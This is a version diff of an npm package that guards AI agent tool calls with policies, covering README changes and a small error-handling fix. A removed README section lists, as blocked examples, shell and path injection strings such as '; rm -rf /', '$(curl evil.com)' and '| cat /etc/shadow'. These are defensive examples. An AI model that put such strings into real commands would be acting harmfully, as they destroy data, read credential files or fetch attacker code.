@solongate/proxy 0.47.1 → 0.47.3

package/README.md

@@ -1,51 +1,73 @@
 # @solongate/proxy
 
-**AI Tool Security Proxy** — Protect any AI tool server with security policies, input validation, rate limiting, and audit logging. Zero code changes required.
+**Security for AI agents.** SolonGate enforces a security policy on every action an AI agent takes — every tool call is allowed, blocked, or logged before it runs. No code changes.
 
 ```
-AI Client ──(stdio)──> SolonGate Proxy ──(stdio)──> Tool Server
-                             │
-                        [rate limit]
-                        [input guard]
-                        [policy eval]
-                        [audit log]
+AI agent ──(tool call)──> SolonGate guard ──> Tool runs
+                               │
+                          [policy eval]   ← OPA-WASM, fail-closed
+                          [prompt-injection scan]
+                          [allow / block / audit]
 ```
 
-**Works with every AI platform:** Claude Code, Claude Desktop, Cursor, Windsurf, Cline, Zed, and any application that uses AI tool calls.
+SolonGate comes in two editions that share the same policy model and dashboard:
 
-## Quick Start
+- **Cloud** — managed, nothing to host. Pair your machine with one command and manage policies + audit logs at [dashboard.solongate.com](https://dashboard.solongate.com).
+- **Local / air-gapped** — run the whole stack on your own hardware with Docker, zero outbound connectivity, no API keys.
 
-### Automatic Setup
+---
 
-Run this in your project directory:
+## Quick start (Cloud)
+
+**You need:** a free [SolonGate account](https://auth.solongate.com), Node.js 18+ on the machine you want to protect, and an AI tool that makes tool calls (Claude Code; Gemini CLI is also supported).
+
+Pair the machine and turn on the guard — one command, no API keys to copy:
 
 ```bash
-npx @solongate/proxy init --all
+npx -y @solongate/proxy@latest login
 ```
 
-Restart your AI client. Done.
+It opens your browser to authorize the device. Approve it from your signed-in dashboard and SolonGate installs a **global guard hook** that intercepts every tool call from every AI session on the machine and evaluates it against your active policy.
+
+> Start a **new** terminal session afterwards — hooks load when a session starts, so already-open terminals aren't guarded yet.
+
+## Write a policy
+
+Open **Policies** in the dashboard and create one. A policy is a set of rules; each rule targets a tool plus a constraint (path / command / filename / URL) and is either ALLOW or DENY. Two modes:
+
+- **Denylist** — everything is allowed except what you block (e.g. deny any file named `*.env`, or commands matching `*rm -rf*`).
+- **Whitelist** — nothing is allowed except what you permit.
 
-### Manual Setup
+Click **Activate** to make a policy the one the guard enforces. Rules compile to an OPA-WASM bundle and take effect on the next tool call.
+
+## Review the audit log
+
+Every decision shows up under **Audit** — what was allowed, what was blocked, and which rule matched. When a legitimate action is blocked, open the entry and click **Whitelist this**: SolonGate adds a narrow ALLOW exception for exactly that action and recompiles. Revoke any exception from **Granted exceptions**.
+
+## Uninstall
+
+```bash
+npx @solongate/proxy init --global --restore
+```
 
-Edit your `.mcp.json`:
+---
+
+## Advanced: wrap a single MCP server (proxy mode)
+
+Instead of the machine-wide guard, you can place SolonGate **in front of one MCP server** so it works with any MCP client (Claude Desktop, Cursor, Windsurf, Cline, Zed, …). Edit your `.mcp.json`:
 
 ```json
 {
   "mcpServers": {
     "my-server": {
       "command": "npx",
-      "args": [
-        "@solongate/proxy",
-        "--policy", "restricted",
-        "--",
-        "node", "./my-server/dist/index.js"
-      ]
+      "args": ["@solongate/proxy", "--policy", "restricted", "--", "node", "./my-server/dist/index.js"]
     }
   }
 }
 ```
 
-## Policy Presets
+### Policy presets
 
 | Preset | Description |
 |--------|-------------|
@@ -54,23 +76,7 @@ Edit your `.mcp.json`:
 | `permissive` | Allows all tools, still enforces input validation |
 | `deny-all` | Blocks all tool calls (emergency lockdown) |
 
-## What Gets Blocked
-
-**Input Guard** (always active):
-- Path traversal: `../../etc/passwd`
-- Shell injection: `; rm -rf /`, `` `whoami` ``, `$(curl evil.com)`
-- Pipe injection: `| cat /etc/shadow`
-- Oversized inputs (DoS prevention)
-
-**Policy Engine** (configurable):
-- Shell execution tools (`shell_exec`, `run_command`, etc.)
-- Eval/exec tools
-- Web fetch (data exfiltration prevention)
-- Any tool matching your custom patterns
-
-## Custom Policies
-
-Create a JSON policy file:
+### Custom policy file
 
 ```json
 {
@@ -78,24 +84,8 @@ Create a JSON policy file:
   "name": "My Custom Policy",
   "version": 1,
   "rules": [
-    {
-      "id": "deny-exec",
-      "effect": "DENY",
-      "priority": 100,
-      "toolPattern": "*exec*",
-      "permission": "EXECUTE",
-      "minimumTrustLevel": "UNTRUSTED",
-      "enabled": true
-    },
-    {
-      "id": "allow-rest",
-      "effect": "ALLOW",
-      "priority": 1000,
-      "toolPattern": "*",
-      "permission": "EXECUTE",
-      "minimumTrustLevel": "UNTRUSTED",
-      "enabled": true
-    }
+    { "id": "deny-exec", "effect": "DENY", "priority": 100, "toolPattern": "*exec*", "permission": "EXECUTE", "minimumTrustLevel": "UNTRUSTED", "enabled": true },
+    { "id": "allow-rest", "effect": "ALLOW", "priority": 1000, "toolPattern": "*", "permission": "EXECUTE", "minimumTrustLevel": "UNTRUSTED", "enabled": true }
   ]
 }
 ```
@@ -104,12 +94,11 @@ Create a JSON policy file:
 npx @solongate/proxy --policy ./my-policy.json -- node my-server.js
 ```
 
-## CLI Options
+### CLI options
 
 ```
 solongate-proxy [options] -- <server-command> [args...]
 
-Options:
   --policy <preset|file>   Policy preset or JSON file (default: restricted)
   --name <name>            Proxy display name
   --verbose                Show detailed error messages
@@ -121,19 +110,15 @@ Options:
   --api-url <url>          Custom API URL (default: api.solongate.com)
 ```
 
-## Restore Original Config
-
-```bash
-npx @solongate/proxy init --restore
-```
+---
 
 ## Why SolonGate?
 
-AI tool servers give AI agents direct access to your system — shell commands, file system, databases, network. A single prompt injection attack can turn your AI assistant into an attacker.
-
-SolonGate sits between the AI client and the tool server, enforcing security policies on every tool call before it reaches the server.
+AI agents get direct access to your system — shell, file system, databases, network. A single prompt-injection attack can turn your assistant into an attacker. SolonGate sits between the agent and the action, enforcing your policy on every tool call before it runs, and recording every decision for audit.
 
-Learn more at [solongate.com](https://solongate.com)
+- **Docs:** [solongate.com/docs](https://solongate.com/docs)
+- **Dashboard:** [dashboard.solongate.com](https://dashboard.solongate.com)
+- **Air-gapped guide:** [solongate.com/docs/local](https://solongate.com/docs/local)
 
 ## License
 

package/dist/index.js

@@ -7510,7 +7510,10 @@ function openBrowser(url) {
   try {
     const cmd = process.platform === "win32" ? "cmd" : process.platform === "darwin" ? "open" : "xdg-open";
     const args = process.platform === "win32" ? ["/c", "start", '""', url] : [url];
-    spawn(cmd, args, { stdio: "ignore", detached: true }).unref();
+    const child = spawn(cmd, args, { stdio: "ignore", detached: true });
+    child.on("error", () => {
+    });
+    child.unref();
   } catch {
   }
 }

package/dist/login.js

@@ -233,7 +233,10 @@ function openBrowser(url) {
   try {
     const cmd = process.platform === "win32" ? "cmd" : process.platform === "darwin" ? "open" : "xdg-open";
     const args = process.platform === "win32" ? ["/c", "start", '""', url] : [url];
-    spawn(cmd, args, { stdio: "ignore", detached: true }).unref();
+    const child = spawn(cmd, args, { stdio: "ignore", detached: true });
+    child.on("error", () => {
+    });
+    child.unref();
   } catch {
   }
 }